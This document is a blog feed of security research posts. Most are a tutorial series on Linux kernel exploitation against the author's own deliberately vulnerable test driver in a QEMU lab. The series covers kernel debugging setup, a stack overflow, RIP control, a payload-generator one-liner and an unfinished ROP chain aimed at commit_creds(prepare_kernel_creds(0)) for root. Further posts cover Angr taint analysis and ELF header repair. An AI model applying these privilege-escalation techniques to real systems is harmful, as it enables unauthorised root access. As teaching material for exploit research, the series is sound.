k3170

[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow

2021-01-18T06:04:00.003-08:00

Previous Post in Series:

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html
[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html
this post

Hi folks! I'm back and this time I've got a banger of a post; we're going to finish off the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and looked at what a few probes around some of the memory structures looked like. If you don't know how to debug a Linux Kernel, build one or build a Qemu image please check out the previous stuff in the series. In this post we're going to start really wielding our power over the stack and craft ROP chains and calls to some interesting functions.

Controlling EIP (No Canary)

Target Driver: https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c

So the last time we discussed about canaries we turned off CONFIG_STACKPROTECTOR and looked at the stack to confirm there was absolutely no protection. What I did after that and behind the scenes was check out if VMAP_STACK has any significant impact, this is because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver, basically changed target_buf to a finite sized char buffer "char target[16]". This seemed to smooth my stack smashing success. So I again implore you to use the target driver for our following set of examples.

First lets find the length at which we start overwriting the return address or register that ends up in RIP. This is not the best explanation but to keep things simple my procedure was: To increase my write length 1 byte at a time, check the kind of error triggered and then set a taint value like 0x43434343 at the end of my payload to see if it ends up in any registers or interesting places when a fault is triggered.

Eventually this laborious process yielded a length of 48 characters before I could perfectly overwrite the RIP value, to demonstrate check out this nifty screenshot:

GDB output showing that an address from our payload is actually executed in the kernel! We officially control execution woo hoo!

For those who want to recreate this using the stuff I setup for the test, you'll need to fire off these commands---making sure you're module is loaded and accessible:

./stacksmash_test_addr.sh 48 [address to execute]

and if you want to see what ./stacksmash_test_addr.sh does, its very simple, it basically just takes a payload length and a hexadecimal address as input and it spits out a string that we can use as a payload, here's the code:

./stacksmash_app.elf `python -c '\

import sys;

address=sys.argv[2];

address_string="".join([chr(int(address[2:][i:i+2],16)) for i in range(0,len(address[2:])+2,2) if len(address[2:][i:i+2]) != 0][::-1]);print("A"*int(sys.argv[1])+address_string)' $LENGTH $ADDR` 10

I've tried to clean it up a bit but honestly all I'm doing here is trying some ugly python to convert a hexadecimal address into a format that ends up in memory properly. Its not crucial to understand everything that happens here because there are much much less complicated ways to achieve this, I'm just trying to go through the most straightforward way as possible so everyone can participate without requiring much background in kernel dev.

In the above screenshot one should note that the breakpoint is set for a weird enough function that we know we are triggering execution---beacause it may happen that you get all happy about triggering a ROP payload when its just natural kernel noise hehe. Congratulations you just controlled execution at one of the highest privilege levels available to a human being---on a Linux computer! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want.

Privilege Escalation for Kernel Intruders

Before we do that lets layout a game plan. There are any number of things we can do with these new gained kernel powers but lets try something simple, get root creds. So what we need to do is get the kernel to make our userland process insta-root! It turns out there are functions loaded into the kernel symbol table that literally do that:

prepare_kernel_creds(struct task_struct *daemon) is a function that generates a cred structure. We need this for our call to the next important function. I know it takes a weird task_struct thing but fret not, the documentation indicates that this can be NULL, which will essentially trigger some default option that gives us "full creds".
commit_creds(struct cred *) this function does the actual deed and installs the cred structure to our task.

So we need some Return Oriented Programing (ROP) chain that puts together a call like this commit_creds(prepare_kernel_creds(0)), which means in terms of assembler instructions, we need:

an instruction chain that puts a null in rdi before we call prepare_kernel_creds. This is because according to calling convention rdi holds the first parameter.
an instruction chain that grabs the returned cred structure---which will be a pointer in rax at this point---, and sticks it in rdi before our call to commit_creds

Beyond this there's also the problem of leaving the realm of the kernel to enjoy your new found powers in middle earth. Luckily for us there's a couple methods one can use to leave, each of them requiring something different of the stack and register value set.

We'll address this after our ROP chain is almost complete, so in summary, our plan so far is:

RIP Control: Find a write length that controls the RIP
ROP Chain: Build a ROP Chain that calls commit_creds(prepare_kernel_creds(0))
Return2Userland: Exit the kernel safely using iretq, sysexit, etc

Our overall plan will vary slightly depending on the protections available in the stack for now lets keep it simple.

Building a ROP chain

We need a tool that will compile some ROP friendly instructions. I relied on ROPGadget.py it seems to get the job done although I'm sure there are tons of tools that will be able to handle this. Here's me dumping ROP gadgets for the kernel im attacking here (which is the Linux 5.9.1):

Screenshot of some ROPGadget.py output after being run on the vmlinux image for our target Kernel.

Okay so we needed to pick up a couple gadgets. To start lets setup a little gadget to call any function pointer on the stack, here are my candidates:

0xffffffff8124529d pop rbx ; ret
0xffffffff8230f2ff call rbx

Using these gadgets means we essentially want to pop something into rbx, this requires us to then have somethin on the stack; for us this means packing in an address to the prepare_kernel_creds call, which would look like this basically:

[AAA...*48][0xffffffff8124529d][prepare_kernel_creds][0xffffffff8230f2ff]

Okay so we need to somehow use ./stacksmash_test_addr.sh to pack two addresses into the payload, I've tried more sophisticated ways and they are currently failing so I've decided to stick with this clunky script for now. Anyway here's how you stuff more than one address into the payload, call stacksmash_test_add.sh as follows:

./stacksmash_test_addr.sh 48 0xffffffff8230f2ffffffffff81088be0ffffffff8124529d

This is going to prove a little tricky because of the default terminal line size on qemu which I haven't figured out how to change yet--I'll update this once i do! Anyway if you get this write what should end up on your stack is the following:

Some gdb output confirming we actually are building a sane payload. Here I just grab the address the buf parameter from a kernel mediated call to vfs_write, this helps me make sure I'm looking at the correct buffer, before the driver touches it.

And if you manage to actually run the sample payload here you should hit breakpoints that indicate you're in control:

That confirms that we are hitting the right notes and we can pretty much call any function now with this neat little gadget! What we need to do now is prepare a ROP chain to stick a NULL in rdi before we make the call to preapre_kernel_cred. And just a note when choosing gadgets I would prioritize those that cause the least stack drama---some ret instructions specify an offset with which to bump the return address so watch out---, affect as little registers as possible. But I suggest just trying stuff, you actually learn a lot from seeing gadgets not work!

I've been stuck at this point for a few weeks so I'm going to cut my losses with this post and end it here we'll prepare the rest of the payload in the next post. Enjoy!

Reading and References

[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel

2020-11-27T07:29:00.006-08:00

Previous Post in Series:

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html

Hi folks this blog post is part of a series in which I'm running through some of the basics when it comes to kernel exploit development for Linux. I've started off the series with a walk through of how to setup your kernel for debugging and included a simple debug driver to target. The post here carries on from this point and explores some stack security paradigms in the kernel.

We're gonna add some stuff to that driver to make it do a dangerous memcpy and then look at whether we can manipulate memory structures with our input. I initially intended to cover full exploit to a root shell with this post but that proved a bit more challenging than I anticipated so I'm splitting this up into two posts. This one will cover almost everything right up to actually controlling the instruction pointer in the kernel and cover a good amount of detail on kernel memory protections for the stack and how they work. So if you'd like to learn more about that stay tuned!

gif showing the correlation between crashes that trigger a kernel fault (everytime ssh connects). One can see the register data includes our payload!This was actually a heap overflow not a stack based overflow oops!

Getting Setup

We're going to progress through this just like any other stack smashing tutorial. I'm going show you some vulnerable code, then we're going to experiment with some payload lengths until we get a crash and take it from there.

To do that we need to make sure we can actually trigger the vulnerable code and that means:

Having a driver script--that invokes the kernel functionality from userspace.
Having a kernel hooked up to a debugger in a relaunch-able vm with debug symbols and all the other configs we need - I explain how to achieve this in the previous post.
Having enough GDB fu to: (1) set a breakpoint, (2) inspect the stack and register values. If you want to follow along like a champ I suggest pausing here and trying to get that done, learn to do those two things and then move on it.

*In the next few paragraphs I show you how to set a breakpoint in the kernel and inspect stack memory, because I lost this copy of the driver and I don't want to make multiple copies of the same code please treat these as tutorials for demonstration and try to recreate them on the version of the driver that wasn't lost.

Okay so if that's in place, we can setup our debugger just as we did in the previous post except we want a setup this time that is going to allow us to inspect the stack so we can actually see what our input is doing to memory. To achieve this we need to first hit the write functions, then look for a more precise breakpoint location so we can conveniently just peek at the stack without too much effort. Lets start with a break-point set for the beginning of the device write function---the one that does that dangerous copy_from_user*---, for us that's called stacksmash_dev_write, here's a quick reminder of how to get that going:

root@syskaller: cat /proc/modules [grab base address]

(gdb) add-symbol-file [PATH]stacksmash_driver.ko [base]

(gdb) break stacksmash_dev_write

Breakpoint 2 at 0x10: stacksmash_dev_write. (2 locations)

For those who need the recap "add-symbol-file" imports symbols from a specified object file, this is done so we have more semantic information while debugging. Next we set a simple breakpoint at stacksmash_dev_write.

* in case you haven't read the code or don't know what the module does, its a pretty straightforward ioctl module with a write and read operation. Its based on the driver used in the previous post the only difference is the write does a copy_to_user into a stack buffer without checking the incoming length.

Cool now we need to trigger the function, to do that we need to invoke the stacksmash_app.elf binary from our qemu target. So we ssh in to the instance, build the app elf and launch as follows:

$ cd [kernel_dir]/image/; ssh -v -i ./stretch.id_rsa -p 10021 root@localhost -o "StrictHostKeyChecking no"

...

root@syskaller: cd /home/
root@syskaller: gcc -o stacksmash_app.elf stacksmash_app.c root@syskaller: insmod stacksmash_driver.ko
root@syskaller: ./stacksmash_app.elf "aaaaaaaa" 10

If all is well you should hit a breakpoint like so:

(gdb) c
Continuing.

Thread 1 hit Breakpoint 2, stacksmash_dev_write (filep=0xffff88806bc30640,
    buffer=0x9 <fixed_percpu_data+9> <error: Cannot access memory at address 0x9>,
    len=140726537215640, offset=0xffffc9000049feb8)
    at drivers/stacksmash//stacksmash_driver.c:96

Which means we are in a comfortable position to track down better breakpoints now.

To find a breakpoint we disassemble the stacksmash_dev_write function:

At offsets 0xffffffffa0000030 to 0xffffffffa0000039 we can see the driver prepping the arguments for copy_from_user, leaving us with:

rdx holding the size
rsi holding the source (our arg string of "a"'s)
rdi holding the destination

We choose some new breakpoints and set em just before the copy_from_user call and one just after, we don this so we can peek at the stack and find out how much damage the input did. To peek we are checking the address that rdi points to before and after the copy_from_user call:

Okay we have full view of what we're doing here, this is good. Now before we can start building exploits lets talk about some of the Linux Kernel's security protections for stack memory and then check which one's we have enabled, see how they work and craft an exploit around this.

*Also please note we're going to swap this driver out for another one that is again slightly modified to make exploitation a bit easier, here I made the mistake of not actually involving any stack variables! So please take this as a quick lesson in GDB foo and debugging kernel drivers but if you'd like to follow on please switch to targeting this driver [https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c]. I hope this doesn't make it too hard to follow, I was also too lazy to re-do the screenshots hehe they came out so neat!

Kernel Stack Memory Protection

Lets look at the stuff in the kernel making modern stack exploitation so difficult ---I believe most of these are accessible via .config by appending CONFIG_ to the name, and sing the ./script/config script:

STACKPROTECTOR: Exploiting a stack overflow requires writing past the end of a buffer into the pointers on the stack. The kernel adds stack canaries to be able to detect when the stack was corrupted. This option controls this but it depends on the config variables HAVE_STACKPROTECTOR, which means you need to make sure that is off if you want this one off. Another important thing to note is that this only tags functions when they "have an 8-byte or larger character array on the stack", which means there may be times a function doesn't get a stack protector in a equivalent stack write operation, or perhaps a stack write is imposed by a compiler optimization?
STACKPROTECTOR_STRONG: This option allows one to widen the heuristics used to add canaries to functions. If this is enabled canaries will be added to functions if they merely have any local variables in an assignment operation among others.
INIT_STACK_NONE: Given how easily one can leak info from uninitialized memory in the kernel i.e. a module uses an uninitialized memory pointer during an IOCTL, doesn't clear it or set it but writes it back to the user---through some craftable call chain or invocation. The problem is so common that there's a config option with sub-options for making sure __user marked variables used in kernel functions are initialized to 0. One can also mark heap objects like this. It obviously doesn't work out well for anyone making assumptions about non-null uninitialized values, but it certainly does solve a big problem.
CONFIG_VMAP_STACK: To help detect stack overflows the kernel community introduced something called a guard page---this whole technique is very similar to something called shadow memory which is used to track memory behavior in static/dynamic analysis engines. This page with is allocated by the kernel after the end of the stack region whenever a process is spun up for execution---the page triggers a seg fault when written to due to its page access rights. After this folks figured out a way to skip over the guard page and make memory regions clash as they grow over each other. The method was first employed in an exploit famously known as Stack Clash developed by the folks at Qualys. To address this I believe VMAP_STACK was developed in order to allow the kernel to map stack addresses to the range of virtual memory addresses used by vmalloc. Because vmalloc ranges are physically non-contiguous it meant wrapping guard pages around stack memory became a lot easier and guard pages became bigger so they are harder to skip over.

We're not going to be turning any of these off just yet, its important to know what the difficulties of exploitation are like in this state and then slowly remove protections to show how and why they work. Now that we know what a modern kernel stack looks like and what we need to dance around lets see if we can overwrite some structures in memory.

Destroying Kernel Stack

Okay now that we can write to memory lets try to make that write count, we need to change a small detail about our driver, namely now instead of just simply making a huge copy_from_user it actually memcpy's the input string to a stack variable like so:

Another important change to mention is that from here on out I turned off KASAN, which can be done by making sure CONFIG_KASAN is not set when you compile your kernel. The reason is pretty simple, KASAN is annoyingly sensitive with memory and triggers panics long before you can actually see what you're doing.

We now need to load up the driver as before but we set some breakpoints that wrap the memcpy like this:

*having done this a couple times now, i recommend actually only taking the breakpoint just after memcpy returns. This is more efficient if you know how to search through memory for the payload and other goodies.

And if we write 17 bytes to the stack for instance we should see the following happen:

*note the stack dump at the end, clearly we're hitting the right memory here.

Which results in the following kernel panic:

We're on the right track! A little worrying here, the kernel is saying stuff about "Kernel stack is corrupted", which means we are overwriting the kernel stack canary value--I mentioned in the section on memory protections. There are two approaches we can take here, 1) get rid of the canary: We can cheat and contrive an example with no such memory protections and explore how easy it is to exploit or 2) leak the canary: We do another sort of cheating and add a flaw to our driver that leaks the canary value. We're gonna do both!

Lets make sure we know where the stack canary is though, I've shown a couple examples here---these are taken from the break point just after the memcpy is hit but I believe any breakpoint in the function should work:

And to boot, we can make 100% sure that we are actually looking at a stack canary value by looking for the following markers:

Usually they are tucked into the stack just before all the other stack frames from previous functions are shown.
Stack canaries almost always occupy a full register size with random looking bytes---this means comparing that position to different runs of the function.

And lastly, when you overwrite them with even one single byte, the kernel gets panicky talking about stack-protector stuff again:

In the above screenshot we can see two separate runs of the stacksmash_driver, the first one writes 16 bytes the second 17, note the difference in the behavior and stack layout. At offset 0xffffc90000015fea8 we can see the stack cookie overwritten by a single 0x41.

Cool we now are well versed at setting breakpoints, finding the stack canary and disassembling the binary so I will try to keep the screenshots a little simple from here on out while showing as much as is needed to make my point. The next step is to explore our options in terms of memory protection now that we can control our payload well and navigate memory structures to some extent.

No Canaries, No Cares

The first thing I'd like to experiment with is no stack protector options for the kernel at all, we can turn them off my issuing the following commands and re-making the kernel:

You'll notice that some options don't get turned off, just ignore them for now; there is a way to force them off but it involves scratching around with the Kconfig default values which can turn into a mess really quickly so I'm not going to advise that. Btw this build will take a while as well, obviously because it affects literally everything that runs in the kernel and requires recompiling everything!

Here's the behavior of the stack overflow when I write 17 bytes without CONFIG_STACKPROTECTOR and CONFIG_STACKPROTECTOR_STRONG:

See no weird 64bit values that look all strange and random, also when we check the function exit prologues we don't see any compares or checks against the canary.

The next thing we need to do is try to corrupt some return pointers but that requires I actually know a little more about what I'm doing here so I'm gonna need a little break to git guud. Please watch this space for the next post.

Thanks for reading!

Reading and References

SporeCrawler : Binary Taint Analysis with Angr

2020-11-12T15:47:00.001-08:00

In this very brief post I'm going to share a tool I've build that does binary taint analysis using Angr. There really isn't much to talk about since the code is pretty readable and not complex but I will also walk though a quick introduction to the concept and why its cool. The post will include links to all the scripts used. I should mention that the tools used here are research tools they have bugs, they don't always run so smooth and there's a bunch of cases they can't manage; but they do give you access to a pretty nifty technology, symbolic execution and taint analysis!

What is Taint Analysis?

Taint analysis is a static analysis method computer scientists and other researchers use in order to track the flow of data in a program. Essentially one does taint analysis to see which points in the programs execution are influenced by user input. This is nifty because it helps prune down source code analysis to the most relevant sections of code. It also obviously helps guide fuzzing toward more fruitful areas of the code too!

The script we're going to develop here simply prints out any dangerous c functions, who's symbolic state is tainted by our input; this means either a register, memory value, file descriptor etc any part of the symbolic state at some point was dependent on our input.

Taint analysis comes in two variants static which is based purely on code and definition analysis; and dynamic which relies on actual execution and instrumentation to collect information. Each approach has its own draw backs, for instance dynamic analysis or any analysis that works purely by collecting live execution data risks under approximating behavior---only being aware of common input path based behavior. The opposite effect is true for static methods, because they only work on source code--although requiring only source or static definitions--can often report more bugs or events than is practically possible. The work of some research is to prune and whittle down these results through various tricks and schemes, blend methods together.

To keep things to the point, in this post we will only focus on easy static taint analysis. The good thing, this taint analysis approach is pretty accurate, it just suffers from a couple draw backs that are sometimes manageable for real world binaries.The upside of this approach is first and foremost that its easy to implement and is relatively accurate. In future research I will hopefully provide some hacks to get Angr running a bit smoother for complex binaries.

Claripy Annotations for Taint Analysis

We're doing taint analysis by using claripy's Annotations. These are basically classes that you can use to tag symbolic vectors or AST elements. It turns out there's a special parameter included in the constructors of claripy.BVS objects that accepts an annotation class. For now we're going to just use a blank instances of the base Annotation class in claripy.

Here's how you setup a symbolic execution run in Angr with an annotated ARGV input:

And then in the hooks we simply check if there's an annotated register, bare in mind when it comes to certain calling conventions rsi, rdi and other registers often hold pointers to parameters, so checking them for annotation first makes sense:

Now why would we want to use annotations? Well when AST binary operations and others involve operands that are annotated, the annotation will be transmitted to the destination operand. This means we can track the data flow of input if we set a start taint on a value we know we control. Angr will handle symbolic execution of the binary for us.The rest of the work is simply developing hooks for the functions we would like to intercept or report on, and making sure the hooks can inspect their symbolic states for annotations.

I've test SporeCrawler on real world binaries from my host machine as well as some simple litmus tests to make sure I'm not going crazy. Here's what a nice run of SporeCrawler looks like, gnuplot is the target binary here:

SporeCrawler has a couple options but it mostly serves to be a good example of implementing angr to do taint analysis, check out more about it here: https://gitlab.com/k3170makan/SporeCrawler.git

[ELF Necromancy 0x0 ] Tricks for Resurrecting dead ELF files

2020-11-11T17:59:00.008-08:00

This post is going to cover some stuff I learned while suffering through some rando keygen style reverse engineering CTFs. Basically, what do you do

in order to patch up an ELF file if say, some of the header information is lost, and can you do this using hexdump and hexedit alone? If you want to know how this turned out, stay tuned!

ELF files don't need all their bells and whistles in order to execute (baring some code that self inspects for some stuff). This means you don't actually need to specify all of the aspects of an ELF file in order to get it working, you can skip or provide false data for debug information and you don't even need working section header meta-data (we'll show an example later on). So naturally some CTF problems will exploit this as some cheap anti-debug because GDB will not accept this either. So how what are some things you can try to recover some information from an ELF file if someone's messed up the meta-data?

Recovering Section Meta-data

Okay so we have an ELF executable called dead.elf and it runs but we cannot

debug it. The challenge is to fixup the binary so that gdb is nice to it.

Fixing up the binary will mean recovering section data and I won't introduce sections here. I've already done a post on these but I will mention some of the important parts to make understanding this post a bit easier. Sections are chunks of an ELF file that contain basically annotations (labels and type information) for other chunks of an ELF file. Your ELF files have a number of important sections holding special collections of code (.init and .fini), the symbol table the bss section and the data section and other good stuff. In order to organize all of this information a couple data structures and offset pointers are needed, namely:

ELF header field e_shentsize - showing the size of the section headers
ELF header field e_shnum - showing the start of the section header table
ELF header field e_shoff - showing the offset in the ELF file where the section headers begin.
Section Header Table - list of data fields for sections (offset, size, type, flags all that schpeel)
Section String Table .shstrtab - list of strings for labeling the sections in the Section Header Table.

Okay so obviously spotting those things in the hex dump will provide you some clues on putting together this puzzle.

To start off with, lets take a look at something very easy to spot in an ELF file, the Section String Table. Here's what the one for the /bin/bash ELF file looks like:

To confirm we are looking at the correct section of the file we can use readelf:

That's freakishly close to the section we guessed above. Another huge clue that this is probably our section string table is obviously the prevalence of section names! Now, if you've found this, you know something else, you know how many sections there are---probably, well a really good guess!

Here's the string table from our dead.elf binary:

I counted 24 distinct section names so I'm going with that!

This information means you can immediately specify the e_shnum---24 section names counted according to me---which helps but we still have more arcane symbols to find, before our ELF lives again! Next we should try and find the beginning of the section header table, if we guess this right then readelf should be able to interpret our sections neatly.

Now you may be super good at this and perhaps can just quickly find groups of bytes with your eye that match the format, but there are a couple of things I realized that could speed up the search:

The section header table entries have two very similar in value fields right after one another, namely: the sh_addr and sh_offset, these fields specify the virtual address of the section (where it will appear in a memory) and the offset of the section in the file, respectively. The reason this has such low entropy during manual inspection is because one number will usually be a predictable offset from the other or likely be the same number repeated! There's a common pattern of sh_offset being at some 0xYYY and the sh_addr then at 0xDYYY where 0xD is some some number between 0x1 and 0xF. This is actually pretty easy to spot in a hex dump.

For Linux based ELF files, there is a noticeable pattern to the type fields, you would only see numbers from a small range. Typically you'll also see some SHT_NOTE sections. Also if the binary is compiled with GNU GCC it may slap in a familiar byte pattern into the sh_type field for its own meta-data, namely the .gnu.version section and its cousins.

example of the "familiar pattern" left in GCC compiled binaries, this is the GNU_HASH section. try to remember this pattern of bytes for later on 0xf6ffff6f

A good place to start the search is after the .shstrtab, in my experience, at least for Ubuntu/GNU GCC ELFs the section header table is usually placed there (this of course may vary by compiler and operating system). In fact the offset usually configured as the start of the e_shoff is actually just the first byte after the .shstrtab ends, which is usually a field of nulls and then the actual section header table.

The last point comes outta nowhere, I don't really have much justification in ths post for saying that so here are some samples showing that often the section header table offset is right after the section string table:

The screenshots above are for grep, please note the extract from readelf as before showing that the section string table begins at 0x3013c. In the dump we can see the end of the section string table and the beginning of the section header table, as confirmed by this screenshot:

hex(197216) = 0x30260, which is right were the .shtrtab ends for us! You're gonna hafta believe me that this is a common enough pattern., mostly because I'm not going to bloat my blog post with lots repetitive examples.

So lets try using these tricks on a real binary, and work it from being a undebuggable defiled corpse to a living breathing totally under our control.

ELF Necromancy in Practice

As mentioned before the binary doesn't respond well to gdb, when trying to open it in gdb we get this annoying message:

>$ gdb ./dead.elf

...

Type "apropos word" to search for commands related to "word"...
"/home/kh3m/Research/CTF/elf_necromancy/misc/./dead.elf": not in executable format: file truncated

Checking this out with readelf:

Looks like the program headers might be just fine---i checked, they are---, which means our binary should still be able to execute; but there's obviously something wrong with the e_shnum and e_shoff fields in the ELF header.

We already have some freebies namely, the location of the .shstrtab, the number of sections 24. So we can patch this up and see if it gives us any more postive feedback, here's the header before the patch:

And here's after:

Okay so that worked out nicely, we have a couple more things to achieve on to the next phase, finding the e_shoff the beginning of the section header table. Given that this is probably compiled with GCC, we can expect the actual e_shoff offset to be near the end of the .shstrtab, here's what that section looks like:

Looking at some of the dead give always for a section header table--especially the 0x6fffff6f we can be pretty confident we just found ours! Looking at the dump I'm going to make the guess that 0x3168 is where it starts; if we patch this in readelf does the following:

And bingo, we have something that can be parsed as a section header table, but there are still some problems, it looks like someone messed with the link fields. We're going to need to fill them out. And I think that will make a great follow up post!

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU

2020-11-10T21:10:00.006-08:00

Hi folks, in this post I'm going to walk through how to setup the linux kernel for debugging. I will also demonstrate that the setup works by setting a break-point to a test driver I wrote myself. All the code will be available from my gitlab, all the links to my gitlab will be re-posted at the end.

The setup I describe here re-uses some parts of the syzkaller setup, and for good reason later on in the post series I will break into a tutorial for the syzkaller tool as well. So lets get on with it.

Screenshot of a successful debug session with full debug symbols for the kernel! We can even see the call to start_kernel and a frame before that as well!

The Process

Okay so we want to study kernel exploitation but given that the kernel isn't something totally accessible in userspace, its not as convenient to debug as userpace stuff, we need a bit of a run up before we can actually poke and prod the kernel to figure out how to write our exploits. So there's a number of important steps to how we get this done, here's what we're going to do:

Build a kernel
Build an image
Launch the virtual machine
Attach and setup the debugger
Building, loading and debugging a test module

We also need to be able to build our kernel because there may be build options that are important to configure in order to control exploit protection or include modules and functionality to the kernel when needed.

Building a Kernel

Okay so before we get going with launching our Qemu instances and debugging modules we need an environment. For convenience sake I'm working off of a fresh Ubuntu 18.04.5 LTS machine. I'll document the processes from fresh install to first successful kernel build.

To start we need to make sure we have everything we need to build a kernel:

$sudo apt-get update

$sudo apt-get upgrade

$sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison qemu-system-x86

Next we obviously need a kernel so lets download a brand new kernel:

$wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz
--2020-11-10 23:00:26-- https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz
Resolving cdn.kernel.org (cdn.kernel.org)... 151.101.225.176, 2a04:4e42:35::432
Connecting to cdn.kernel.org (cdn.kernel.org)|151.101.225.176|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 115538096 (110M) [application/x-xz]
Saving to: ‘linux-5.9.7.tar.xz’

linux-5.9.7.tar.xz 42%[=============> ] 46.79M 3.08MB/s eta 23s

...

$tar -xf linux-5.9.7.tar.xz

We're just a couple steps from sending the final build commands, before we get to that lets make sure the kernel config is ready to rock. Because we're working on a Linux host we can simply swipe the .config for the virtual machine's Ubuntu kernel like so:

$cp /boot/config-5.4.0-52-generic .config

We then need to select some options that make debugging and exploit dev a little easier. First thing we need is to merge some options for making the kernel easier to run in a virtual machine:

$make kvmconfig

Using .config as base
Merging ./kernel/configs/kvm_guest.config
#
# merged configuration written to .config (needs make)
#

...

Great, now we need to enable some options for debug symbols, kaslr and other awesome things. So open the .config somewhere in a text editor and make sure you either add or modify the file so these options are set:

CONFIG_KCOV=y
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
# CONFIG_RANDOMIZE_BASE is not set

Cool now we need to make sure the config is ready to go for a build:

$make savedefconfig

$make -j4

...

Now you should grab some coffee, play a startcraft2 game because this may take a while. Okay so if your build worked you should have an object file in the following location:

[kernel_dir]/arch/x86_64/boot/bzImage

Build an image

We're going to build an image for this kernel so we might as well plop a "image" directory in this folder:

$mkdir [kernel_dir]/image/

Once you're kernel is build we need to start thinking about how to build a file system for this. Here I'm going to cheat and steal some tips from the syzkaller folks. We need to first download syzkaller, as follows:

$git clone https://github.com/google/syzkaller.git

Cloning into 'syzkaller'...
remote: Enumerating objects: 1, done.
remote: Counting objects: 100% (1/1), done.
...

Move back to the kernel build and setup an image:

$cd [kernel_dir]/image/

$cp [syzkaller_dir]/tools/create_image.sh .

Okay so we can now create an image, all we need to do is simply invoke create_image.sh:

$./create_image.sh

+ DIR=chroot
+ PREINSTALL_PKGS=openssh-server,curl,tar,gcc,libc6-dev,time,strace,sudo,less,psmisc,selinux-utils,policycoreutils,checkpolicy,selinux-policy-default,firmware-atheros,python,xrdp,g++,make,libtool,autoconf,nasm
+ '[' -z ']'
+ ADD_PACKAGE=make,sysbench,git,vim,tmux,usbutils,tcpdump

...

If that worked you should have the following in your folder:

$ls

chroot/

create-image.sh

stretch.id_rsa

stretch.id_rsa.pub

stretch.img

Launch the virtual machine

Now we can launch qemu with all the goodies in place:

qemu-system-x86_64 \
-kernel ../arch/boot/x86_64/bzImage \
-append "console=ttyS0 root=/dev/sda earlyprintk=serial nokaslr"\
-hda ./stretch.img \
-net user,hostfwd=tcp::10021-:22 -net nic \
-enable-kvm \
-nographic \
-m 2G \
-s \
-S \
-smp 2 \
-pidfile vm.pid \
2>&1 | tee vm.log

...

The -s is a shorthand for -gdb tcp::1234, which means the gdbserver will be hosted at port 1234. -S tells qemu not to start the cpu automatically, this gives us a chance to set a breakpoint before the kernel starts executing.

So that's the image running smoothly, lets setup our debugging environment.

Attach and setup the debugger

We can then attach a gdb debugger to the qemu instance as follows. On another terminal, separate from the one running your qemu instance, start up gdb and issue the following commands:

$cd [kernel_dir]/image/

$gdb ../vmlinux

Reading symbols from ../vmlinux...

(gdb) target remote :1234

Remote debugging using :1234
0x000000000000fff0 in exception_stacks ()

(gdb) c

We give the "c" command to continue execution. We can now set some of our own breakpoints. As part of the tutorial I've included a custom IOCTL driver and app code (code that invokes the ioctl from userspace), i thought this would be nifty since it shows full ability to develope and debug a driver, something crucial to hunting down modern bugs and exploit development. Anyway lets code and build our own module.

Building, Loading and debugging a test module

Okay so we need to make a test ioctl driver, so lets head over the to kernel source directory and make a new folder in the /driver/ subfolder:

$cd [kernel_dir]/drivers/

$mkdir debug_driver/

$cd debug_driver/

$touch debug_driver.c

$touch debug_driver_app.c

$touch Makefile

The code for debug_driver.c and debug_driver_app.c as we well as the Makefile are available at this repo https://gitlab.com/k3170makan/linux-kernel-exploit-development. All you need to do is download the repo and stick this in its own folder under [kernel_dir]/drivers/. To build the module the we need to set the "M" variable in the kernel make script:

$cd [kernel_dir]; make -C . M=drivers/debug_driver/

make: Entering directory '/home/kh3m/Research/Kernel/debug_image/linux-5.5.3'
AR drivers/debug_driver//built-in.a
CC [M] drivers/debug_driver//debug_driver.o

...

Now we need to get this module on our qemu host somehow, I do this the hard way, I'm sure there's all sorts of nifty ways to scp files onto the qemu host but I actually just re-create the image after copying the drivers to a folder to be baked into the start up filesystem. First we need to edit create-image.sh so it includes everything in a folder we specify, that way we can just dump stuff in the folder and run create-image.sh whenever we want those files on a live instance.

So before create-image.sh builds the disk image on line 129, stick this in there:

++ sudo cp -r ./add/* $DIR/home/.

now we make a "add" folder and stick the kernel module and app code in there:

$ cd [kernel_dir]/image/

$ mkdir add/

$ cd add/

$ cp ../../drivers/debug_driver/debug_driver.ko .

$ cp ../../drivers/debug_driver/debug_driver_app.c .

$ ./create-image.sh

Okay so we have a module, we have a symbol file debug_driver.ko, with stuff we need to set breakpoints. Lets load the module into the kernel, then check where it gets loaded before we actually set the breakpoint:

root@syzkaller:$ cd /home/

root@syzkaller:$ insmod debug_driver.ko

[   32.792570] audit: type=1400 audit(1605058227.605:7): avc: denied { module_load } for pid=249 comm="insmod" path="/home/debug_driver.ko" dev="sda" ino=21253 scontext=system_u:system_r:kernel_t:s0 1
[   32.793766] debug_driver: loading out-of-tree module taints kernel.
[   32.800394] [debug_driver] loaded!
[   32.800826] [debug_driver] device registered successfully
[   32.802298] [debug_driver] device has been successfully created

Before we can debug it properly we need to know where it is loaded in kernel memory:

root@syzkaller:/home# cat /proc/modules
debug_driver 16384 0 - Live 0xffffffffa0000000 (O)

Okay lets now set our breakpoint and load the symbol file using the base address of the module:

(gdb) add-symbol-file ../drivers/debug_driver/debug_driver.ko 0xffffffffa0000000
add symbol table from file "../drivers/debug_driver/debug_driver.ko" at
.text_addr = 0xffffffffa0000000
(y or n) y
Reading symbols from ../drivers/debug_driver/debug_driver.ko...
(gdb) break dev_read
